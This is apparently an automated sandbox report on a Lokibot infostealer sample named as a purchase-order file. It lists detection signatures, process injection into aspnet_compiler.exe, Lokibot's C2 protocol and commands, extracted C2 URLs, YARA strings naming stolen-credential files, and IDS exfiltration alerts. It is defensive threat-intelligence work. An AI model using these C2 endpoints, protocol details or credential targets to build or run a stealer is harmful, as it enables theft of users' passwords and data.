Edit tour

Windows Analysis Report
(PO403810)_VOLEX_doc.exe

Overview

General Information

Sample name:	(PO403810)_VOLEX_doc.exe
Analysis ID:	1517995
MD5:	aa2edba076823e2d67c52d3055a15e80
SHA1:	f8ab944af1bf067fcd7f6806311ccd98374d98cd
SHA256:	506acdbf6f6334fb4b7519e45d60f3c90b115853fa4b76d0670bf20698f4c7c4
Tags:	exeuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

(PO403810)_VOLEX_doc.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe" MD5: AA2EDBA076823E2D67C52D3055A15E80)

aspnet_compiler.exe (PID: 720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17980:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4d4b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1358f:$des3: 68 03 66 00 00 0x17980:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17a4c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1cbd0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x9f83:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x187c7:$des3: 68 03 66 00 00 0x1cbd0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1cc9c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x120dec:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x14522a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 720	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 720	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 720	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2662:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe", ParentImage: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe, ParentProcessId: 6936, ParentProcessName: (PO403810)_VOLEX_doc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 720, ProcessName: aspnet_compiler.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:09.125494+0200	2024312	1	A Network Trojan was detected	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.982295+0200	2024312	1	A Network Trojan was detected	192.168.2.7	49700	188.114.97.3	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T10:19:08.211638+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.969314+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.837774+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.688864+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.615421+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.711569+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.581402+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.376989+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.178646+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.296157+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:19.154274+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:20.137435+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:21.053477+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.842648+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.855192+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.676953+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.570672+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.439700+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.269752+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.206792+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:29.037709+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.847888+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.733826+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:32.177777+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.989857+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49730	188.114.97.3	80	TCP
2024-09-25T10:19:33.800027+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49731	188.114.97.3	80	TCP
2024-09-25T10:19:34.631187+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49732	188.114.97.3	80	TCP
2024-09-25T10:19:35.482687+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49733	188.114.97.3	80	TCP
2024-09-25T10:19:36.537688+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49734	188.114.97.3	80	TCP
2024-09-25T10:19:37.356070+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49735	188.114.97.3	80	TCP
2024-09-25T10:19:39.239881+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49736	188.114.97.3	80	TCP
2024-09-25T10:19:40.078687+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49737	188.114.97.3	80	TCP
2024-09-25T10:19:40.911451+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49738	188.114.97.3	80	TCP
2024-09-25T10:19:41.735560+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49739	188.114.97.3	80	TCP
2024-09-25T10:19:42.570720+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49740	188.114.97.3	80	TCP
2024-09-25T10:19:43.399885+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49741	188.114.97.3	80	TCP
2024-09-25T10:19:44.190956+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49742	188.114.97.3	80	TCP
2024-09-25T10:19:45.016789+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49743	188.114.97.3	80	TCP
2024-09-25T10:19:45.828745+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49744	188.114.97.3	80	TCP
2024-09-25T10:19:46.711712+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49745	188.114.97.3	80	TCP
2024-09-25T10:19:47.595407+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49746	188.114.97.3	80	TCP
2024-09-25T10:19:48.437321+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49747	188.114.97.3	80	TCP
2024-09-25T10:19:49.234722+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49748	188.114.97.3	80	TCP
2024-09-25T10:19:50.049266+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49749	188.114.97.3	80	TCP
2024-09-25T10:19:50.858143+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49750	188.114.97.3	80	TCP
2024-09-25T10:19:51.659793+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49751	188.114.97.3	80	TCP
2024-09-25T10:19:52.634585+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49752	188.114.97.3	80	TCP
2024-09-25T10:19:53.523329+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49753	188.114.97.3	80	TCP
2024-09-25T10:19:54.536452+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49754	188.114.97.3	80	TCP
2024-09-25T10:19:55.485678+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49755	188.114.97.3	80	TCP
2024-09-25T10:19:56.301649+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49756	188.114.97.3	80	TCP
2024-09-25T10:19:57.172763+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49757	188.114.97.3	80	TCP
2024-09-25T10:19:59.000979+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49758	188.114.97.3	80	TCP
2024-09-25T10:19:59.891904+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49759	188.114.97.3	80	TCP
2024-09-25T10:20:00.718978+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49760	188.114.97.3	80	TCP
2024-09-25T10:20:01.526168+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49761	188.114.97.3	80	TCP
2024-09-25T10:20:02.392071+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49763	188.114.97.3	80	TCP
2024-09-25T10:20:03.257255+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49764	188.114.97.3	80	TCP
2024-09-25T10:20:04.071220+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49765	188.114.97.3	80	TCP
2024-09-25T10:20:05.030104+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49766	188.114.97.3	80	TCP
2024-09-25T10:20:05.858737+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49767	188.114.97.3	80	TCP
2024-09-25T10:20:06.718238+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49768	188.114.97.3	80	TCP
2024-09-25T10:20:07.582940+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49769	188.114.97.3	80	TCP
2024-09-25T10:20:09.443638+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49770	188.114.97.3	80	TCP
